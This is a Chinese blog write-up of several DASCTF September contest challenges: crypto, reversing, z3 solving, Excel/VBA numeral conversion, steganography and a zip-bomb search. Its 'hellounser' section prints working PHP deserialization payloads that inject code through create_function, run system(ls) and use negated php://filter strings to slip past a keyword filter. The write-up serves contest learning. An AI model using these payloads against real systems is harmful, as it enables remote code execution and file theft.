DASCTF Sept X 浙江工业大学秋季挑战赛 部分wp


比赛完全被神光师傅带飞,芜湖~

师傅博客地址:m1n9yu3

[toc]

签到

网鼎杯青龙组原题

https://tieba.baidu.com/p/6671953167

sagemath

m = 73964803637492582853353338913523546944627084372081477892312545091623069227301
c = 21572244511100216966799370397791432119463715616349800194229377843045443048821
n = 2** 256

e=discrete_log(c,mod(m,n))

print(e)

e = 34852863801130149185238904762083023615101
b’flag{DASCTF_zjut}’

ea5ycpp

直接猜出来的

d = [  0x68, 0x6F, 0x65, 0x6C, 0x81, 0x69, 0x7A, 0x3D, 0x3B, 0x79,
  0x6B, 0x73, 0x38, 0x39, 0x7B, 0x70, 0x7B, 0x48, 0x73, 0x7C,
  0x85, 0x47, 0x7C, 0x96]
for i in range(len(d)):
    print(chr(d[i] - 2 - i), end='')

pig_brain_king

图片

点了 1000 次 累死了

直接 patch 判断是否成功的地方

然后疯狂的 点 1 然后回车

easy_math

#!/usr/bin/python3
# coding = utf-8

from z3 import *


s = Solver()

x = Int("x")
y = Int("y")
z = Int("z")
c = Int("c")

s.add(x-c==107010778014077)
s.add(y-c==379654844783)
s.add(z-c == 104686361407310)
s.add(c+z+y+x == 212351672173114)

s.check()
print(s.model())

直接 z3 解方程

拿到

然后拼接一下

flag{he11o_F1boNacci!}

Girlfriend’s account

excel 函数

两个 payload

=SUM(ISNUMBER(SEARCH(TEXT({1,2,3,4,5,6,7,8,9},"[dbnum2]"&{"0亿";"0仟!*万";"0佰!*万";"0拾!*万";"0万";"万!*0仟";"万!*0佰";"万!*0拾";"0元";"0角";"0分"}),IF(ISERR(FIND("万",A2)),"万",)&A2))*{1,2,3,4,5,6,7,8,9}*10^{8;7;6;5;4;3;2;1;0;-1;-2})

=IF(B3="壹",1,IF(B3="贰",2,IF(B3="叁",3,IF(B3="肆",4,IF(B3="伍",5,IF(B3="陆",6,IF(B3="柒",7,IF(B3="捌",8,IF(B3="玖",9)))))))))

flag{12305926.36}


excel 宏(vba)

记一下 excel 大写金额抓阿拉伯数字的 vba,脚本来自:中文大小写数字转阿拉伯数字-Excel VBA程序开发-ExcelHome技术论坛 -

这个脚本不能处理类似这样的:一百零肆角肆分,需要把零去掉,变为:一百肆角肆分才行,所以直接把表格内的零全替换为空即可

Public Function CNToNum(sDBNum)
'=============================
'中文大小写转阿拉伯数字函数
'中文大写人民币数字转阿拉伯数字
'by mzbao
'=============================
    Dim sCNnum$, sCNExp$, ExpArr, temp, i%, sChar$, NumChar$
    Dim m%, n%, rNum%, d%
    Dim LastExp%, Exp%, sFlag$, HasExp As Boolean

    sCNnum = "〇零一二三四五六七八九壹贰叁肆伍陆柒捌玖00123456789123456789"
    sCNExp = ",十,百,千,万,亿,兆,拾,佰,仟,萬,1,2,3,4,8,12,1,2,3,4"
    ExpArr = Split(sCNExp, ",")

    For i = 1 To 3
        sDBNum = Replace(sDBNum, Mid("整角分", i, 1), "")
        sDBNum = Replace(sDBNum, Mid("点元圆", i, 1), ".")
        sDBNum = Replace(sDBNum, Mid("○", i, 1), "零")
    Next i

    sDBTxt = sDBNum
    For i = Len(sDBTxt) To 1 Step -1
        sChar = Mid(sDBTxt, i, 1)
        m = InStr(sCNnum, sChar)
        If m > 0 Then
            If rNum = 0 Then rNum = i
            If m <= 20 Then
                NumChar = Mid(sCNnum, m + 20, 1)
            Else
                NumChar = sChar
            End If
            If HasExp = False Then
                temp = NumChar & temp
            Else
                temp = NumChar & Mid(temp, 2)
                If NumChar = 0 Then temp = 1 & Mid(temp, 2)
            End If
            HasExp = False
            If Exp > LastExp Then LastExp = 0
        Else
            n = InStr(sCNExp, sChar)
            If n > 0 Then
                Exp = ExpArr(n / 2 + 10)
                If InStr(",4,8,12,", "," & Exp & ",") Then
                    If LastExp >= Exp Then
                        LastExp = LastExp + Exp: Exp = 0
                    Else
                        LastExp = Exp: Exp = 0
                    End If
                End If
                sFlag = String(Exp + LastExp + 1 + d, "0")
                temp = Format(1 * temp, sFlag)
                HasExp = True
            End If
            If sChar = "." Then
                If i < rNum Then d = rNum - i
            End If
        End If
    Next
    If Left(temp, 1) = "0" And Len(temp) > 1 And Len(temp) > d + 1 Then temp = 1 & Mid(temp, 2)

    CNToNum = 1 * temp / 10 ^ d
End Function

python

脚本来源:大写金额转小写(千万以下)

def hantonum(str1):
    dict1 = {'一': 1, '二': 2, '三': 3, '四': 4, '五': 5, '六': 6, '七': 7, '八': 8, '九': 9}
    dict2 = {'十': 10, '百': 100, '千': 1000, '万': 10000, '元': 1, '角': 0.1, '分': 0.01}
    result = 0
    for index,i in enumerate(str1):
        if index<len(str1)-1:
            if (i in dict1 and str1[index+1] in dict2) or (i in dict2 and str1[index+1]=='万'):
                if str1[index+1] !='万':
                    result += dict1[i] * dict2[str1[index+1]]
                elif i in dict2:
                    result *=10000
                else:
                    result += dict1[i]
                    result *= 10000
    return result

print(hantonum('一千九百八十五万八千六百二十九元三角二分'))
print(hantonum('一千九百三十万八千六百二十八元三角二分'))
print(hantonum('一千九百零三万八千六百二十九元整'))

双目失明,身残志坚

盲水印解开, 然后 拼音盲文对照表

zh e j iang g ong ie d a x ue

flag{zhejianggongyedaxue}

ZipBomb

import os.path
import zipfile
import re
dir_path='C:\\Users\\Snowywar\\Desktop\\zipBomb'
files= os.listdir(dir_path)
newfiles = files[::-1]
print(newfiles)
setee = []
for file in newfiles: #遍历文件夹
    position = dir_path+'\\'+ file #构造绝对路径,"\\",其中一个'\'为转义符
    print (position)
    z = zipfile.ZipFile(position, 'r')
    for filename in z.namelist():
        bytes = z.read(filename)
        if b'Zmxh' in bytes:
            print(filename)

flag{F!nD_Fl4g_1n_2IP_13OMB}

hellounser

这个闭合可是要好好记着,很多情况都可以用。payload

<?php
/**
 * @Author: ying
 * @Date:   2021-09-25 13:41:23
 * @Last Modified by:   ying
 * @Last Modified time: 2021-09-25 20:42:24
 */
class A {
    public $var;
    public function __construct(){
        $this->var = new B();
    }
}
class B{
    public $func;
    public $arg;
    public function __construct(){
        $this->func = "create_function";
        // $this->arg = "}var_dump(get_defined_vars());//";
        $this->arg = "}require(base64_decode(VHJ1M2ZsYWcucGhw));var_dump(get_defined_vars());//";
    }
}
echo urlencode(serialize(new A()));

一键打出来

F2

取反也是很常见的,参考了BUUCTF-日刷-DASCTF Sept X 浙江工业大学秋季挑战赛]hellounser/反序列化-正则过滤

首先还是要用到闭合,直接执行命令好嘛(system里面的参数不加引号也可以识别,为什么?问了就是php特性。在哪里看到的我也忘了,有缘再见hhh)

$this->func = "create_function";
$this->arg = "return(1);}system(ls);//";

但是过滤了 flag | \* | \? 等不能直接查看,考虑取反(懒的写了,直接拿了师傅的脚本)

$ac=(~('php://filter/read=convert.base64-encode/resource=Tru3flag.php'));
$at='return(1);}require(~('.strval($ac).'));//';
$a = new A;
$b = new B;
$b->func="create_function";;
$b->arg=$at;
$a->var=$b;
$ser = serialize($a);
//echo $ser;
echo urlencode($ser);

文章作者: yq1ng
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 yq1ng !
评论
  目录